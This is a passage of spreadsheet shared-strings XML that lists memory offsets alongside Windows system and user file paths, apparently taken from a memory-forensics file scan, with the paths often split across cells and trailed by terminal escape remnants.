    <t>\Windows\winsxs\FileMaps\$$_system32_windowspowershell_v1.0_modules_applocker_b50db0a500311141</t>
  </si>
  <si>
    <t>0xde716298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-ndis_f0ef0c61452d5b2</t>
  </si>
  <si>
    <t>8.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde716680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-msmq-messagingcorese</t>
  </si>
  <si>
    <t>rvice_a2ca72d</t>
  </si>
  <si>
    <t>b0bdebee3.c</t>
  </si>
  <si>
    <t>0xde716a68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-mediaplayer_644fa9f0</t>
  </si>
  <si>
    <t>de4025eb.cdf-</t>
  </si>
  <si>
    <t>0xde716d30</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiasa002.inf_x86_neutral_d00cb75222cc8460\wiasa00</t>
  </si>
  <si>
    <t>0xde716e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-mediaplayer-drm-dl_5</t>
  </si>
  <si>
    <t>52be0fd1dd444</t>
  </si>
  <si>
    <t>d0.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xde717450</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_ro-ro_5b50dd6a5fce5f0b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde717880</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnep004.inf_x86_neutral_25623e649d146f5d\prnep00</t>
  </si>
  <si>
    <t>0xde717d30</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_ras_06656461d047b86c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde717f18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_pt-br_5783f3346581bed3.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde718240</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\arcsas.inf_x86_neutral_c763887719bed95d\arcsas.in</t>
  </si>
  <si>
    <t>0xde718360</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_replacementmanifests_microsoft-windows-terminalser</t>
  </si>
  <si>
    <t>vices-license</t>
  </si>
  <si>
    <t>server_cff2</t>
  </si>
  <si>
    <t>bf5f87</t>
  </si>
  <si>
    <t>6a8fcd.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde718748</t>
  </si>
  <si>
    <t>vices-appserv</t>
  </si>
  <si>
    <t>er-licensin</t>
  </si>
  <si>
    <t>g_10d3</t>
  </si>
  <si>
    <t>d9d862990d9c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde718b30</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_replacementmanifests_microsoft-windows-shmig_9ef85</t>
  </si>
  <si>
    <t>dcb89d16c58.c</t>
  </si>
  <si>
    <t>df-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde718df8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnca00z.inf_x86_neutral_494753193fc9051a\prnca00</t>
  </si>
  <si>
    <t>0xde718f18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_replacementmanifests_microsoft-windows-offlinefile</t>
  </si>
  <si>
    <t>s-core_3b6498</t>
  </si>
  <si>
    <t>3f65339578.</t>
  </si>
  <si>
    <t>cdf-ms</t>
  </si>
  <si>
    <t>0xde7190c8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\hpsamd.inf_x86_neutral_84ae149ecc9f8033\hpsamd.in</t>
  </si>
  <si>
    <t>0xde7195c8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmjf56e.inf_x86_neutral_be032a9152b5642f\mdmjf56</t>
  </si>
  <si>
    <t>0xde719680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_logfiles_firewall_488be49cc4415d55.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde719b30</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_logfiles_ait_5b4995189d2e6c55.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde719cb0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_ko-kr_4e039de673c23e4a.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde71a038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnsh002.inf_x86_neutral_c41038f4d2ab5958\prnsh00</t>
  </si>
  <si>
    <t>0xde71a298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-international-core-d</t>
  </si>
  <si>
    <t>l_d66e65e1080</t>
  </si>
  <si>
    <t>457e5.cdf-m</t>
  </si>
  <si>
    <t>0xde71a680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-iis-dl_8822f736d253a</t>
  </si>
  <si>
    <t>cda.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xde71aa68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-ie-esc_881b20a0d2777</t>
  </si>
  <si>
    <t>648.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xde71ad30</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmtdkj6.inf_x86_neutral_2c282453839753e3\mdmtdkj</t>
  </si>
  <si>
    <t>0xde71ae50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-iasserver-migplugin_</t>
  </si>
  <si>
    <t>96e6769f77269</t>
  </si>
  <si>
    <t>6e5.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde71b038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_sl-si_5d374a0c5cf4bbc8.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde71b480</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_speech_common_8c297630658eaa3d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde71b868</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_smi_schema_b445cd341d59fadc.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde71bb00</t>
  </si>
  <si>
    <t>0xde71bc50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_slmgr_0409_c09c721c0002fb96.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde71c038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\sffdisk.inf_x86_neutral_7e5210507f8fc265\sffdisk.</t>
  </si>
  <si>
    <t>0xde71c298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-performancecounterin</t>
  </si>
  <si>
    <t>frastructure-</t>
  </si>
  <si>
    <t>dl_887290e3</t>
  </si>
  <si>
    <t>6ed2c9</t>
  </si>
  <si>
    <t>60.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde71c680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-offlinefiles-dl_ed0c</t>
  </si>
  <si>
    <t>7082ff497ba5.</t>
  </si>
  <si>
    <t>cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde71ca68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-networkloadbalancing</t>
  </si>
  <si>
    <t>0156d9ead.c</t>
  </si>
  <si>
    <t>0xde71ce50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-networkbridge_6f3bab</t>
  </si>
  <si>
    <t>cf8612f78b.cd</t>
  </si>
  <si>
    <t>0xde71d038</t>
  </si>
  <si>
    <t>\Users\Support\Music\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xde71d108</t>
  </si>
  <si>
    <t>\Users\Public\Music\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xde71dd38</t>
  </si>
  <si>
    <t>0xde71deb8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\DisplaySwitch.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde71e350</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_wlms_06656c47df2f885f.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde71e538</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_windowspowershell_v1.0_modules_troubleshootingpack_en-us_</t>
  </si>
  <si>
    <t>53560fea81cb8</t>
  </si>
  <si>
    <t>acf.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde71e858</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_winrm_0409_a9926295fab42c40.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde71ed08</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_windowspowershell_v1.0_modules_troubleshootingpack_aa01ee</t>
  </si>
  <si>
    <t>5573cb1655.cd</t>
  </si>
  <si>
    <t>0xde71eeb8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\nulhpopr.inf_x86_neutral_ec00f8f18ac02be3\nulhpop</t>
  </si>
  <si>
    <t>0xde71f1b8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ActionCenter.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde71f8f8</t>
  </si>
  <si>
    <t>\Windows\System32\msadp32.acm_x001B_[0K</t>
  </si>
  <si>
    <t>0xde720b80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xde720eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_7_for_KB3138612~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde721130</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmpin.inf_x86_neutral_f0c406047f5a7dc5\MDMPIN.in</t>
  </si>
  <si>
    <t>0xde721250</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_zh-hk_6a84939e4900ccf6.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde721638</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_zh-cn_6a8499504900c466.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde721a20</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_wlms_en-us_941fe848405c366f.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde721ce8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netl1e86.inf_x86_neutral_a34f2431367128ea\netl1e8</t>
  </si>
  <si>
    <t>0xde722038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_ru-ru_5b50e7f65fce4fdb.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde722480</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_sk-sk_5d374dfc5cf4b5c5.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde722868</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_setup_en-us_afa35959583f5dbd.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde722c50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_setup_5d3758a05cf4a445.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde723298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_tracing_bca9e27848ac4cc0.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde723680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_temp_401038c9a18c18c0.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde723a68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system_4c3aa2308f9f8f41.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde723d30</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnts003.inf_x86_neutral_b5366a7425b89579\prnts00</t>
  </si>
  <si>
    <t>0xde723e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_zh-tw_6a84aa664900aad6.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde724178</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\volume.inf_x86_neutral_6dee0205881d1a1d\volume.in</t>
  </si>
  <si>
    <t>0xde724488</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\vhdmp.inf_x86_neutral_efa659e9a38d5b8c\vhdmp.inf_x001B_</t>
  </si>
  <si>
    <t>0xde724938</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_spool_drivers_w32x86_3_en-us_cc27677906e15f61.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde724b20</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_spool_drivers_color_714407f67ff22f9d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde724d00</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netevbdx.inf_x86_neutral_7f439b41eebc75ae\netevbd</t>
  </si>
  <si>
    <t>0xde724f80</t>
  </si>
  <si>
    <t>\Windows\System32\Speech\SpeechUX\en-us\sapi.cpl.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde725148</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netxe32.inf_x86_neutral_2d971e2b4a578e3d\netxe32.</t>
  </si>
  <si>
    <t>0xde725298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_en-us_b32d907252d3e073.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7255c8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmagrm.inf_x86_neutral_8ff94c5737626019\mdmagrm.</t>
  </si>
  <si>
    <t>0xde725680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_networking-mpssvc-svc_e23ab12e0e23ec55</t>
  </si>
  <si>
    <t>0xde725a68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-wmi-core_0fa6ec0ad02</t>
  </si>
  <si>
    <t>9fddb.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde725e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-unimodem-config_2000</t>
  </si>
  <si>
    <t>ab316115550f.</t>
  </si>
  <si>
    <t>0xde726150</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmpsion.inf_x86_neutral_26845d3968953608\mdmpsio</t>
  </si>
  <si>
    <t>n.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde726298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_web_wallpaper_characters_a0a6ad47bc54d5d2.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde726680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_web_wallpaper_architecture_7e5377d6faf00937.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde726a68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_web_3f580d25a4c8e0a0.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde726d30</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\net1y32.inf_x86_neutral_17f1bc814dc1043f\net1y32.</t>
  </si>
  <si>
    <t>0xde726e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_twain_32_209f76caa35c9a77.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde727298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_web_wallpaper_windows_bcf8a09f6400ad61.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde727680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_web_wallpaper_scenes_bd7cd5771e94d62b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde727a68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_web_wallpaper_nature_be2d0c211d1167a9.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde727d30</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\net8187se86.inf_x86_neutral_dbc0aab1acd9c67e\net8</t>
  </si>
  <si>
    <t>187se86.inf_x001B_[</t>
  </si>
  <si>
    <t>0xde727e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_web_wallpaper_landscapes_dd1321c96ffce30a.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde728308</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_crypto_pcpksp_windowsaik_cb9775b914a8e5a2.cdf-m</t>
  </si>
  <si>
    <t>0xde7286f0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_crypto_keys_584b284368b25bef.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde728aa0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_crypto_dss_machinekeys_43de8c451bf80cb4.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde728d30</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmcpq2.inf_x86_neutral_d5315a7393dd6002\mdmcpq2.</t>
  </si>
  <si>
    <t>0xde728e50</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\rdpbus.inf_x86_neutral_27637529205407be\rdpbus.in</t>
  </si>
  <si>
    <t>0xde729210</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migration_wsmt_rras_replacementmanifests_microsoft-window</t>
  </si>
  <si>
    <t>s-rasserver-m</t>
  </si>
  <si>
    <t>igplugin_b1</t>
  </si>
  <si>
    <t>d9b81e</t>
  </si>
  <si>
    <t>0b884bcc.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7295f8</t>
  </si>
  <si>
    <t>s-rasapi-migp</t>
  </si>
  <si>
    <t>lugin_4c5cf</t>
  </si>
  <si>
    <t>bc1cee</t>
  </si>
  <si>
    <t>bb383.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7299e0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migration_wsmt_rras_replacementmanifests_475f557ec0a59abb</t>
  </si>
  <si>
    <t>0xde729d10</t>
  </si>
  <si>
    <t>0xde729dc8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migration_wsmt_rras_dlmanifests_microsoft-windows-rasserv</t>
  </si>
  <si>
    <t>er-migplugin_</t>
  </si>
  <si>
    <t>60ef4b1ac83</t>
  </si>
  <si>
    <t>68ae4.</t>
  </si>
  <si>
    <t>0xde72a298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-textservicesframewor</t>
  </si>
  <si>
    <t>k-migration-d</t>
  </si>
  <si>
    <t>l_549205906</t>
  </si>
  <si>
    <t>affe6b</t>
  </si>
  <si>
    <t>f.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde72a530</t>
  </si>
  <si>
    <t>0xde72a680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-tapisetup_0be6007940</t>
  </si>
  <si>
    <t>c10533.cdf-ms</t>
  </si>
  <si>
    <t>0xde72aa68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-sxs_214556d37cabee6c</t>
  </si>
  <si>
    <t>0xde72ae50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-storagemigration_d55</t>
  </si>
  <si>
    <t>783f2ccb64b27</t>
  </si>
  <si>
    <t>0xde72b150</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_wbem_en-us_4555b1beb1c13883.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde72b300</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\rdlsbuscbs.inf_x86_neutral_351e56205fd4c200\rdlsb</t>
  </si>
  <si>
    <t>uscbs.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde72b680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_wbem_06656d9fdf2f8577.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde72ba68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_uk-ua_61042a3457416b73.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde72bd30</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnkm005.inf_x86_neutral_a2013031e279b6f6\prnkm00</t>
  </si>
  <si>
    <t>0xde72be50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_tr-tr_5f1dd1e45a1af0a7.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7403b8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmbr004.inf_x86_neutral_98c1a220af939228\mdmbr00</t>
  </si>
  <si>
    <t>0xde740800</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_devicesync_d6b7928aa153816d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7409e8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_crypto_rsa_machinekeys_aa739417efae0d58.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde740aa0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_device_stage_device_113527a4-45d4-4b6f-b567-978</t>
  </si>
  <si>
    <t>38f1b04b0__5d</t>
  </si>
  <si>
    <t>055d2c3e7e3</t>
  </si>
  <si>
    <t>719.cd</t>
  </si>
  <si>
    <t>0xde740e50</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ql40xx.inf_x86_neutral_77a826e5c0a07842\ql40xx.in</t>
  </si>
  <si>
    <t>0xde765360</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_device_stage_task_e35be42d-f742-4d96-a50a-1775f</t>
  </si>
  <si>
    <t>b1a7a42_en-us</t>
  </si>
  <si>
    <t>_98bc184903</t>
  </si>
  <si>
    <t>c637fe</t>
  </si>
  <si>
    <t>0xde765748</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_device_stage_task_07deb856-fc6e-4fb9-8add-d8f2c</t>
  </si>
  <si>
    <t>f8722c9__0ce7</t>
  </si>
  <si>
    <t>c057892d577</t>
  </si>
  <si>
    <t>4.cdf-</t>
  </si>
  <si>
    <t>0xde765a10</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ph3xibc4.inf_x86_neutral_310871d800afa82a\Ph3xIBC</t>
  </si>
  <si>
    <t>0xde765b30</t>
  </si>
  <si>
    <t>f8722c9_en-us</t>
  </si>
  <si>
    <t>_66e939cf45</t>
  </si>
  <si>
    <t>0318c4</t>
  </si>
  <si>
    <t>0xde765f18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_device_stage_device_8702d817-5aad-4674-9ef3-4d3</t>
  </si>
  <si>
    <t>decd87120__87</t>
  </si>
  <si>
    <t>40ea4a07ab7</t>
  </si>
  <si>
    <t>2cd.cd</t>
  </si>
  <si>
    <t>0xde7661e0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\hidbth.inf_x86_neutral_96487048bb26cf0c\hidbth.in</t>
  </si>
  <si>
    <t>0xde766298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_diagnosis_downloadedscenarios_995fa01e94b9ae39.</t>
  </si>
  <si>
    <t>0xde7665c8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\bda.inf_x86_neutral_41c6262952846788\bda.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde766680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_diagnosis_asimovuploader_0413bca0c3dfdda4.cdf-m</t>
  </si>
  <si>
    <t>0xde766a68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_diagnosis_af2ddc54e6a8e491.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde766e60</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5FED0F3E2FD40A39335EA07101</t>
  </si>
  <si>
    <t>14A3A8_135A40</t>
  </si>
  <si>
    <t>D964A9A527D</t>
  </si>
  <si>
    <t>15581B</t>
  </si>
  <si>
    <t>84FEF479E_x001B_[0K</t>
  </si>
  <si>
    <t>0xde766f18</t>
  </si>
  <si>
    <t>b1a7a42__96ac</t>
  </si>
  <si>
    <t>8d0751fb5c2</t>
  </si>
  <si>
    <t>c.cdf-</t>
  </si>
  <si>
    <t>0xde7674a8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\faxcn001.inf_x86_neutral_7e5a499c236b8028\faxcn00</t>
  </si>
  <si>
    <t>1.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7675c8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_diagnosis_etllogs_ffc0f561f3797ceb.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7677b0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_diagnosis_etllogs_autologger_91adf7c94bd2d1fa.c</t>
  </si>
  <si>
    <t>0xde7679b0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ehstorpwddrv.inf_x86_neutral_ecd233d7cabbdebf\ehs</t>
  </si>
  <si>
    <t>torpwddrv.inf</t>
  </si>
  <si>
    <t>0xde767a68</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\disk.inf_x86_neutral_b1d91cea6f3429b1\disk.inf_x001B_[0</t>
  </si>
  <si>
    <t>0xde767e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_diagnosis_downloadedsettings_f4a4d355cda0ca19.c</t>
  </si>
  <si>
    <t>0xde768038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_diagnosis_etllogs_shutdownlogger_5ca7b57d60632f</t>
  </si>
  <si>
    <t>51.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde768298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_ehome_72ce881aee6c0ff2.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde768630</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\lsi_fc.inf_x86_neutral_a7088f3644ca646a\lsi_fc.in</t>
  </si>
  <si>
    <t>0xde7686e8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_diagnosis_sideload_1bd7d65b4945242a.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7688d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_diagnosis_localtracestore_b69b398684e58a86.cdf-</t>
  </si>
  <si>
    <t>0xde768cb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_identitycrl_9ceb7e1568e6c6e7.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde769198</t>
  </si>
  <si>
    <t>\Windows\rescache\wip\Segment2.toc_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7692b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_user_account_pictures_default_pictures_e70ab248</t>
  </si>
  <si>
    <t>4087f163.cdf-</t>
  </si>
  <si>
    <t>0xde7696a0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_network_connections_2e5c3accd04dd407.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde769e50</t>
  </si>
  <si>
